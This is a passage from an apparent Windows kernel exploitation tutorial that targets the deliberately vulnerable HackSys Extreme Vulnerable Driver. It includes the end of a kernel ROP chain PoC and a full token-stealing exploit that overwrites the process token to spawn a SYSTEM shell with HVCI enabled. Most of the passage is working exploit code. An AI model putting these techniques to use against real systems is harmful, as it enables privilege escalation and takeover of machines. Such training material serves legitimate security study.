            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
        }
    
        // Every path returns a value, so callers can check the result
        return success;
    }
    
    int main()
    {
        printf("[+] Opening handle to driver\n");
        HANDLE hDriver = CreateFileW(
            L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
            FILE_SHARE_WRITE,
            nullptr,
            OPEN_EXISTING,
            0,
            nullptr);
    
        if (hDriver == INVALID_HANDLE_VALUE)
        {
            printf("[!] Failed to open handle: %d", GetLastError());
            return 1;
        }
    
        // Step 1
    
        printf("[+] Creating a dummy thread..\n");
        HANDLE dHandle = fakethread();
        if (!dHandle) {
            return 1;
        }
    
        getchar();
    
        // Step 2
        PVOID dKTHREAD = findKTHREAD(dHandle);
        if (dKTHREAD == NULL) {
            printf("[-] Unable to find KTHREAD of the dummy thread!\n");
            return 1;
        }
    
        getchar();
    
        // Step 3
        PVOID stackLimit = kernelRead(PVOID((uintptr_t)dKTHREAD + 0x30), hDriver);
        printf("[+] Dummy thread's StackLimit: %p\n", stackLimit);
    
        PVOID stackBase = kernelRead(PVOID((uintptr_t)dKTHREAD + 0x38), hDriver);
        printf("[+] Dummy thread's StackBase: %p\n", stackBase);
    
        getchar();
    
        // Step 4
        LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe");
        printf("[+] Nt base address: %p\n", nt_addr);
    
        int stackSize = (uintptr_t)stackBase - (uintptr_t)stackLimit;
        PVOID retAddr = NULL;
        PVOID stackRet = NULL;
        for (int i = 0x8; i < stackSize - 0x8; i += 0x8)
        {
            retAddr = kernelRead(PVOID((uintptr_t)stackBase - i), hDriver);
    
            if (retAddr == PVOID((uintptr_t)nt_addr + 0x00403bef)) // nt!KiApcInterrupt+0x2ff
            {
                printf("[+] Found nt!KiApcInterrupt+0x2ff in the stack %p\n", PVOID((uintptr_t)stackBase - i));
                stackRet = PVOID((uintptr_t)stackBase - i);
                break;
            }
        }
    
        getchar();
    
        // Step 5
        
        // RCX - ProcessHandle
        HANDLE hSystem = NULL;
    
        // R8 - ObjectAttributes
        OBJECT_ATTRIBUTES objAttrs = { 0 };
        memset(&objAttrs, 0, sizeof(objAttrs));
        objAttrs.ObjectName = NULL;
        objAttrs.Length = sizeof(objAttrs);
    
        // R9 - ClientId
        CLIENT_ID clientId = { 0 };
        clientId.UniqueProcess = ULongToHandle(4);
        clientId.UniqueThread = NULL;
    
        LPVOID rop[] = {
            (LPVOID)((uintptr_t)nt_addr + 0x00202e71), // pop rcx; ret
            (LPVOID)&hSystem, // Handle
            (LPVOID)((uintptr_t)nt_addr + 0x004e13ce), // pop rdx; ret
            (LPVOID)PROCESS_ALL_ACCESS,
            (LPVOID)((uintptr_t)nt_addr + 0x00201861), // pop r8; ret
            (LPVOID)&objAttrs,
            (LPVOID)((uintptr_t)nt_addr + 0x00201862), // pop rax; ret
            (LPVOID)&clientId,
            (LPVOID)((uintptr_t)nt_addr + 0x00343f0e), // mov r9, rax; mov rax, r9; add rsp, 0x28; ret;
            (LPVOID)(0x4141414141414141), // 0x8
            (LPVOID)(0x4141414141414141), // 0x10
            (LPVOID)(0x4141414141414141), // 0x18
            (LPVOID)(0x4141414141414141), // 0x20
            (LPVOID)(0x4141414141414141), // 0x28
            (LPVOID)((uintptr_t)nt_addr + 0x003fb260), // nt!ZwOpenProcess
            (LPVOID)((uintptr_t)nt_addr + 0x00202e71), // pop rcx; ret
            (LPVOID)(ULONG64)dHandle, // Thread Handle
            (LPVOID)((uintptr_t)nt_addr + 0x004e13ce), // pop rdx; ret
            (LPVOID)(0x0000000000000000),
            (LPVOID)((uintptr_t)nt_addr + 0x003fb800), // nt!ZwTerminateThread // Step 6
        };
    
        printf("[+] Writing Shellcode to the thread stack...\n");
    
        for (int i = 0; i < sizeof(rop) / sizeof(rop[0]); i++) {
            kernelWrite((rop[i]), stackRet, hDriver);
            stackRet = (LPVOID)((uintptr_t)stackRet + 0x8);
        }
    
        getchar();
    
        // Step 7
    
        ResumeThread(dHandle);
    
        Sleep(2000);
    
        printf("[+] System process Handle 0x%p\n", hSystem); // a HANDLE is pointer-sized, so print it with %p
    
        getchar();
    
        CloseHandle(dHandle);
        CloseHandle(hDriver);
    
        getchar();
    
        return 0;
    }
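
As a quick sanity check on the WRITE_WHAT_WHERE_IOCTL definition used in the POC above, this sketch reproduces the bit layout of the SDK’s CTL_CODE macro in portable C++ and evaluates it. The constant values are the ones from the Windows SDK headers. The function name ctlCode is made up for this example.

```cpp
#include <cassert>
#include <cstdint>

// Values as defined in the Windows SDK headers.
constexpr std::uint32_t kFileDeviceUnknown = 0x00000022;
constexpr std::uint32_t kMethodNeither     = 3;
constexpr std::uint32_t kFileAnyAccess     = 0;

// Same bit layout as the SDK's CTL_CODE macro:
// device type in bits 16+, access in bits 14-15, function in bits 2-13, method in bits 0-1.
constexpr std::uint32_t ctlCode(std::uint32_t deviceType, std::uint32_t function,
                                std::uint32_t method, std::uint32_t access) {
    return (deviceType << 16) | (access << 14) | (function << 2) | method;
}
```

ctlCode(kFileDeviceUnknown, 0x802, kMethodNeither, kFileAnyAccess) evaluates to 0x22200B, the IOCTL code of ArbitraryWriteIoctlHandler mentioned at the start of the post.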
    

Method (5) - Token Stealing

The next method is Token Stealing, which again leverages the Write-What-Where vulnerability. HVCI stays enabled for this method, and yet it is easy to perform.

Every process has a “Token” (and a thread can carry its own when impersonating), which represents its security context and contains information about the user account, group memberships, privileges, and access rights. The image below from Process Hacker shows the Token of the System process; stealing it would give us the same permissions as SYSTEM.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Before getting into writing the exploit, we need to know some basic things which we need for the POC.

Each process’s Token is stored as an _EX_FAST_REF union, which can be accessed from the EPROCESS structure.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

The EPROCESS structure contains a member called ActiveProcessLinks, a doubly linked list entry that points to the next process’s EPROCESS.ActiveProcessLinks, and a UniqueProcessId member, which is the PID of that process.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

With the above information, we are going to follow these steps:

  • Step 1: Leak the System process’s EPROCESS address.
  • Step 2: Starting from the System EPROCESS, follow the ActiveProcessLinks member and find our exploit’s EPROCESS with the help of the UniqueProcessId member.
  • Step 3: Steal the System process’s EPROCESS.Token value.
  • Step 4: Retrieve our exploit’s EPROCESS.Token value.
  • Step 5: Overwrite our exploit’s EPROCESS.Token value with the System Token.

Step 1: Leak system’s EPROCESS structure

To find the System process’s EPROCESS we can use the same approach as in “Method (4)”: with the help of NtQuerySystemInformation() we can get every handle’s object address and search those for the handle of the System process.

Interestingly, System’s first handle is the handle to its own process, which makes the work really easy.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Here is the updated code to get the EPROCESS structure of the system process:

  • Like before, we get every handle on the machine using NtQuerySystemInformation().
  • Then we take the very first entry in SYSTEM_HANDLE_INFORMATION and check whether its UniqueProcessId (the PID) is 4, because the System process’s PID is always 4 and, as shown above, its first handle refers to the System process itself.
  • If the UniqueProcessId of the first entry is 4, we take the entry’s Object, which is the EPROCESS address of the System process.
  • As shown in the Process Hacker image above, the object type of that handle is “Process”, so the address associated with it is the address of an EPROCESS.
PVOID findEPROCESS() {
    pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(
        GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");

    if (!NtQuerySystemInformation) {
        printf("[-] Unable to find ntdll!NtQuerySystemInformation\n");
        return FALSE;
    }

    printf("[+] Found ntdll!NtQuerySystemInformation\n");

    ULONG returnLen = 0x1000;
    NTSTATUS status;

    PSYSTEM_HANDLE_INFORMATION SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (SIZE_T)returnLen);

    do {
        if (SystemHandleInfo) {
            HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
        }

        SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, returnLen);
        if (!SystemHandleInfo) {
            printf("[-] HeapAlloc Failed With Error: %d\n", GetLastError());
            return FALSE;
        }

        status = NtQuerySystemInformation(SystemHandleInformation, SystemHandleInfo, returnLen, &returnLen);
    } while (status == STATUS_INFO_LENGTH_MISMATCH);

    PVOID sysEPROCESS = NULL;
    if (SystemHandleInfo->Handles[0].UniqueProcessId == 4) {
        sysEPROCESS = SystemHandleInfo->Handles[0].Object;
        printf("[+] Found EPROCESS of the system %p\n", sysEPROCESS);
    }

    // Free the handle snapshot on both paths; sysEPROCESS stays NULL if the first entry is not PID 4
    HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
    return sysEPROCESS;
}

int main()
{

[::]

 // Step 1

 PVOID sysEPROCESS = findEPROCESS();
 if (sysEPROCESS == NULL) {
     printf("[-] Unable to find EPROCESS of the system.exe!\n");
     return 1;
 }
 
[::]
 
}

I executed the POC and it retrieved the EPROCESS address of the System process, which is the same as the address of the “Process” handle.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

This can also be verified with the !process command in WinDBG using the retrieved address. The Image is System, which confirms that we got the EPROCESS structure of the System process.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 2: Find exploit’s EPROCESS structure

Now that we have the EPROCESS address of the System process, we can loop over the doubly linked list (ActiveProcessLinks) to get the address of each next process’s EPROCESS.ActiveProcessLinks.

  • I copied the offsets of the required members from the EPROCESS structure and stored them with #define for easy access.
  • We begin by getting the current process ID using GetCurrentProcessId() and storing it in pid.
  • The address of the System process’s EPROCESS.ActiveProcessLinks is stored in SysProcHead.
  • Then the while loop begins to find the EPROCESS of the exploit (current) process.
  • It uses the same kernelRead function to read the next process’s EPROCESS.ActiveProcessLinks and stores that in nextProc.
  • From nextProc, it subtracts the offset of ActiveProcessLinks to get to the beginning of that process’s EPROCESS structure, because the ActiveProcessLinks doubly linked list always points to the next process’s EPROCESS.ActiveProcessLinks, not to the EPROCESS itself.
  • Then it computes the address of UniqueProcessId in that EPROCESS structure and, again using kernelRead, reads the value and stores it in foundpid. If this is not the PID of the exploit process, the loop continues.
#define Offset_ActiveProcessLinks 0x448
#define Offset_UniqueProcessId 0x440
#define Offset_Token 0x4b8

[::]

// Step 2

printf("[+] Attempting to find EPROCESS address of the current process...\n");
DWORD pid = GetCurrentProcessId();
printf("[+] Current Process ID: 0x%lx\n", pid);
PVOID SysProcHead = PVOID((uintptr_t)sysEPROCESS + Offset_ActiveProcessLinks);
DWORD foundpid = 0;
PVOID nextPid = 0;
PVOID nextProc = sysEPROCESS;

while (pid != foundpid) {
    nextProc = kernelRead(PVOID((uintptr_t)nextProc + Offset_ActiveProcessLinks), hDriver);
    nextProc = PVOID((uintptr_t)nextProc - Offset_ActiveProcessLinks);
    nextPid  = PVOID((uintptr_t)nextProc + Offset_UniqueProcessId);
    foundpid = (DWORD)(uintptr_t)kernelRead(nextPid, hDriver);

    // Compare list-entry addresses: if we are back at System's ActiveProcessLinks,
    // the whole list has been walked without a match
    if (PVOID((uintptr_t)nextProc + Offset_ActiveProcessLinks) == SysProcHead) {
        printf("[-] Failed to find target's EPROCESS\n");
        return 1;
    }
}

if (nextProc == NULL) {
    printf("[-] Unable to find EPROCESS of current process!\n");
    return 1;
}

PVOID currentEPROCESS = nextProc;
printf("[+] Found EPROCESS address of current process: %p\n", currentEPROCESS);
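
The pointer arithmetic in this walk (follow Flink, subtract the ActiveProcessLinks offset, read the PID) can be tried out on a simulated list. The sketch below uses a tiny FakeProcess structure in place of EPROCESS and a read64 helper in place of kernelRead. All of these names, and the PIDs in demoWalk, are made up for the illustration.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

struct ListEntry {
    ListEntry* Flink;
    ListEntry* Blink;
};

// Simplified stand-in for EPROCESS: only the two members the walk needs.
struct FakeProcess {
    std::uint64_t UniqueProcessId;
    ListEntry ActiveProcessLinks;
};

static_assert(sizeof(void*) == 8, "sketch assumes 64-bit pointers, like the x64 target");

// Stand-in for kernelRead(): fetch 8 bytes from an address.
std::uint64_t read64(std::uintptr_t addr) {
    std::uint64_t value = 0;
    std::memcpy(&value, reinterpret_cast<const void*>(addr), sizeof(value));
    return value;
}

// Follow Flink from start. Each Flink points at the links member of the next
// entry, so subtract that member's offset to get back to the structure base.
// Returns the base address of the entry with the given pid, or 0 on wrap-around.
std::uintptr_t findByPid(std::uintptr_t start, std::uint64_t pid) {
    const std::size_t linksOff = offsetof(FakeProcess, ActiveProcessLinks);
    const std::size_t pidOff = offsetof(FakeProcess, UniqueProcessId);
    std::uintptr_t cur = start;
    do {
        if (read64(cur + pidOff) == pid) {
            return cur;
        }
        const std::uintptr_t flink = static_cast<std::uintptr_t>(read64(cur + linksOff));
        cur = flink - linksOff;
    } while (cur != start);
    return 0;
}

// Link four fake processes into a circular list and return the index of pid (-1 if absent).
int demoWalk(std::uint64_t pid) {
    FakeProcess procs[4] = {};
    const std::uint64_t pids[4] = {4, 0x1a0, 0x2b4, 0x9c8};
    for (int i = 0; i < 4; ++i) {
        procs[i].UniqueProcessId = pids[i];
        procs[i].ActiveProcessLinks.Flink = &procs[(i + 1) % 4].ActiveProcessLinks;
        procs[i].ActiveProcessLinks.Blink = &procs[(i + 3) % 4].ActiveProcessLinks;
    }
    const std::uintptr_t base = reinterpret_cast<std::uintptr_t>(&procs[0]);
    const std::uintptr_t found = findByPid(base, pid);
    if (found == 0) {
        return -1;
    }
    assert((found - base) % sizeof(FakeProcess) == 0);
    return static_cast<int>((found - base) / sizeof(FakeProcess));
}
```

One difference from the real kernel is worth keeping in mind: the real list also passes through the list head nt!PsActiveProcessHead, which is not embedded in any EPROCESS, so the PID read at that position is meaningless. The sketch leaves that out.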

Executed the POC and as expected, it found the EPROCESS structure of the exploit (whatwhere4.exe).

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 3: Steal system’s Token

Now that we have the EPROCESS addresses of both the System process and the exploit, we can read the Token value of the System process first. This step simply reads that value and stores it in sysToken.

// Step 3

PVOID sysToken = kernelRead(PVOID((uintptr_t)sysEPROCESS + Offset_Token), hDriver);
printf("[+] System's EPROCESS.Token value: %p\n", sysToken);

The updated code retrieved the Token value of the system process.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 4: Retrieve exploit’s Token

This step is the same as the previous one, except that we read the Token value of the exploit (whatwhere4.exe).

// Step 4

PVOID curToken = kernelRead(PVOID((uintptr_t)currentEPROCESS + Offset_Token), hDriver);
printf("[+] Current Process's EPROCESS.Token value: %p\n", curToken);

The reason to read this value first instead of directly overwriting the Token is that _EX_FAST_REF is a union whose low bits hold RefCnt, the reference count. It should not be disturbed; if it’s wrong, it might lead to a BSOD.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 5: Replace the Token value

Now we overwrite the whatwhere4.exe token with the System token, except for the low 4 bits (RefCnt), to avoid any disruption in the reference count. After overwriting the Token value, we launch cmd.exe.

// Step 5
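// Keep our own RefCnt (low 4 bits) and take only the pointer bits from the System token
PVOID newToken = (PVOID((uintptr_t)curToken & 0xf));
newToken = (PVOID((uintptr_t)newToken | ((uintptr_t)sysToken & ~(uintptr_t)0xf)));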
printf("[+] Modified EPROCESS.Token value: %p\n", newToken);

printf("[+] Attempting to overwrite current process's Token to escalate...\n");
BOOL status = kernelWrite(newToken, PVOID((uintptr_t)currentEPROCESS + Offset_Token), hDriver);

if (!status) {
    printf("[-] Failed to overwrite current process's Token value...\n");
    return 1;
}

getchar();

printf("[+] Spawning a shell with elevated privileges\n\n");
system("cmd");
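
The token merge is plain bit masking, so it can be checked in isolation. This is a minimal sketch assuming the x64 layout, where the low 4 bits of an _EX_FAST_REF are RefCnt and the remaining bits are the object pointer. The helper names are hypothetical, and the token values in the note below are invented examples, not values from my machine.

```cpp
#include <cassert>
#include <cstdint>

// Assumption: x64 _EX_FAST_REF, low 4 bits = RefCnt, the rest = object pointer.
constexpr std::uint64_t kRefCntMask = 0xF;

// Pointer part of a fast reference (RefCnt bits cleared).
constexpr std::uint64_t fastRefObject(std::uint64_t value) {
    return value & ~kRefCntMask;
}

// RefCnt part of a fast reference.
constexpr std::uint64_t fastRefCount(std::uint64_t value) {
    return value & kRefCntMask;
}

// Pointer bits from the System token, RefCnt bits from our own token.
constexpr std::uint64_t mergeToken(std::uint64_t sysToken, std::uint64_t curToken) {
    return fastRefObject(sysToken) | fastRefCount(curToken);
}
```

For example, mergeToken(0xffffa10f1e8418b7, 0xffffa10f2a4c6063) gives 0xffffa10f1e8418b3: the System token’s pointer with the exploit process’s own reference count of 3. Masking the System value before the OR matters. Otherwise its RefCnt bits (7 here) would be mixed into the result.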

Got system:

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

We got a shell as SYSTEM with HVCI enabled. We didn’t actually bypass anything here; we just stole the Token of the System process. Still, it’s a really effective way to get SYSTEM.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Note: Starting with Windows 11 24H2, EnumDeviceDrivers() and NtQuerySystemInformation() only return kernel addresses to callers that hold SeDebugPrivilege. This means you must already be an Administrator to use them on the latest Windows 11 version, which can be a problem for this technique.

  • Full POC

    #include <Windows.h>
    #include <stdio.h>
    #include <psapi.h>
    #include "header.h"
    
    #define WRITE_WHAT_WHERE_IOCTL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS)
    typedef NTSTATUS(WINAPI* pNtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
    
    #define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
    #define Offset_ActiveProcessLinks 0x448
    #define Offset_UniqueProcessId 0x440
    #define Offset_Token 0x4b8
    
    typedef struct _WRITE_WHAT_WHERE {
        void* WHAT;
        void* WHERE;
    } WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;
    
    // Reads one pointer-sized value from readAddr: the driver copies *WHAT
    // (the kernel address) into *WHERE (our user-mode buffer).
    PVOID kernelRead(PVOID readAddr, HANDLE hDriver) {
    
        WRITE_WHAT_WHERE input;
        LPVOID storeAddr = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
        if (!storeAddr) {
            return NULL;
        }
    
        input.WHAT = (LPVOID)(readAddr);
        input.WHERE = (LPVOID)(storeAddr);
    
        DWORD bytesReturned = 0;
        BOOL success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            &bytesReturned,
            nullptr);
    
        // Return NULL if the IOCTL failed, then release the scratch page.
        PVOID data = success ? *(LPVOID*)storeAddr : NULL;
        VirtualFree(storeAddr, 0, MEM_RELEASE);
        return data;
    }
    
    // Writes one pointer-sized value to writeAddr: WHAT points at our local
    // copy of the data, WHERE is the kernel address to overwrite.
    BOOL kernelWrite(PVOID data, PVOID writeAddr, HANDLE hDriver) {
    
        WRITE_WHAT_WHERE input;
        input.WHAT = (LPVOID)(&data);
        input.WHERE = (LPVOID)(writeAddr);
    
        // printf("[+] Calling TriggerArbitraryWrite to Write on %p....", writeAddr);
    
        DWORD bytesReturned = 0;
        // DeviceIoControl returns a BOOL, not an NTSTATUS.
        return DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            &bytesReturned,
            nullptr);
    }
    
    PVOID findEPROCESS() {
        pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(
            GetModuleHandleW(L"ntdll.dll"), "NtQuerySystemInformation");
    
        if (!NtQuerySystemInformation) {
            printf("[-] Unable to find ntdll!NtQuerySystemInformation\n");
            return NULL;
        }
    
        printf("[+] Found ntdll!NtQuerySystemInformation\n");
    
        ULONG returnLen = 0x1000;
        NTSTATUS status;
        PSYSTEM_HANDLE_INFORMATION SystemHandleInfo = NULL;
    
        // Retry with the length reported by the call until the handle table fits.
        do {
            if (SystemHandleInfo) {
                HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
            }
    
            SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, returnLen);
            if (!SystemHandleInfo) {
                printf("[-] HeapAlloc Failed With Error: %lu\n", GetLastError());
                return NULL;
            }
    
            status = NtQuerySystemInformation(SystemHandleInformation, SystemHandleInfo, returnLen, &returnLen);
        } while (status == STATUS_INFO_LENGTH_MISMATCH);
    
        // The code expects the first handle entry to belong to the System process (PID 4).
        PVOID sysEPROCESS = NULL;
        if (status >= 0 && SystemHandleInfo->Handles[0].UniqueProcessId == 4) {
            sysEPROCESS = SystemHandleInfo->Handles[0].Object;
            printf("[+] Found EPROCESS of the system %p\n", sysEPROCESS);
        }
    
        HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
        return sysEPROCESS;
    }
    
    int main()
    {
        printf("[+] Opening handle to driver\n");
        HANDLE hDriver = CreateFileW(
            L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
            FILE_SHARE_WRITE,
            nullptr,
            OPEN_EXISTING,
            0,
            nullptr);
    
        if (hDriver == INVALID_HANDLE_VALUE)
        {
            printf("[!] Failed to open handle: %lu\n", GetLastError());
            return 1;
        }
    
        // Step 1
    
        PVOID sysEPROCESS = findEPROCESS();
        if (sysEPROCESS == NULL) {
            printf("[-] Unable to find EPROCESS of the system.exe!\n");
            return 1;
        }
    
        getchar();
    
        // Step 2
    
        printf("[+] Attempting to find EPROCESS address of the current process...\n");
        DWORD pid = GetCurrentProcessId();
        printf("[+] Current Process ID: 0x%lx\n", pid);
        DWORD foundpid = 0;
        PVOID nextPid = 0;
        PVOID nextProc = sysEPROCESS;
    
        while (pid != foundpid) {
            PVOID nextLink = kernelRead(PVOID((uintptr_t)nextProc + Offset_ActiveProcessLinks), hDriver);
            if (nextLink == NULL) {
                printf("[-] Unable to find EPROCESS of current process!\n");
                return 1;
            }
    
            // Flink points at the next entry's ActiveProcessLinks field; step back to the EPROCESS base.
            nextProc = PVOID((uintptr_t)nextLink - Offset_ActiveProcessLinks);
            if (nextProc == sysEPROCESS) {
                // Wrapped around the whole list without finding our PID.
                printf("[-] Failed to find target's EPROCESS\n");
                return 1;
            }
    
            nextPid  = PVOID((uintptr_t)nextProc + Offset_UniqueProcessId);
            foundpid = (DWORD)(uintptr_t)kernelRead(nextPid, hDriver);
        }
    
        PVOID currentEPROCESS = nextProc;
        printf("[+] Found EPROCESS address of current process: %p\n", currentEPROCESS);
    
        getchar();
    
        // Step 3
    
        PVOID sysToken = kernelRead(PVOID((uintptr_t)sysEPROCESS + Offset_Token), hDriver);
        printf("[+] System's EPROCESS.Token value: %p\n", sysToken);
    
        getchar();
    
        // Step 4
    
        PVOID curToken = kernelRead(PVOID((uintptr_t)currentEPROCESS + Offset_Token), hDriver);
        printf("[+] Current Process's EPROCESS.Token value: %p\n", curToken);
    
        getchar();
    
        // Step 5
        // Object pointer from the System token, RefCnt (low 4 bits) from the current token
        PVOID newToken = PVOID(((uintptr_t)sysToken & ~(uintptr_t)0xf) | ((uintptr_t)curToken & 0xf));
        printf("[+] Modified EPROCESS.Token value: %p\n", newToken);
    
        printf("[+] Attempting to overwrite current process's Token to escalate...\n");
        BOOL status = kernelWrite(newToken, PVOID((uintptr_t)currentEPROCESS + Offset_Token), hDriver);
        
        if (!status) {
            printf("[-] Failed to overwrite current process's Token value...\n");
            return 1;
        }
    
        getchar();
    
        printf("[+] Spawning a shell with elevated privileges\n\n");
        system("cmd");
    
        return 0;
    }
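
As a side note on the WRITE_WHAT_WHERE_IOCTL definition in the PoC, the following sketch shows how the CTL_CODE arguments combine into 0x22200B, the IOCTL code given at the start of this post. It mirrors the bit layout of the SDK's CTL_CODE macro, but the function name ctlCode and the k-prefixed constants are our own, so that the snippet also builds without Windows.h.

```cpp
#include <cstdint>

// Values as defined in the Windows SDK headers; only the names are ours.
constexpr uint32_t kFileDeviceUnknown = 0x22; // FILE_DEVICE_UNKNOWN
constexpr uint32_t kMethodNeither     = 3;    // METHOD_NEITHER
constexpr uint32_t kFileAnyAccess     = 0;    // FILE_ANY_ACCESS

// Same bit layout as CTL_CODE:
// DeviceType in bits 16-31, Access in 14-15, Function in 2-13, Method in 0-1.
constexpr uint32_t ctlCode(uint32_t deviceType, uint32_t function,
                           uint32_t method, uint32_t access) {
    return (deviceType << 16) | (access << 14) | (function << 2) | method;
}

// 0x220000 | 0x0 | 0x2008 | 0x3 == 0x22200B
static_assert(ctlCode(kFileDeviceUnknown, 0x802, kMethodNeither, kFileAnyAccess) == 0x22200B,
              "matches the IOCTL code handled by ArbitraryWriteIoctlHandler");
```

Because the method bits are METHOD_NEITHER, the driver receives the raw user-mode pointer to the input structure, which is why the PoC passes &input directly to DeviceIoControl.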
    

Reference: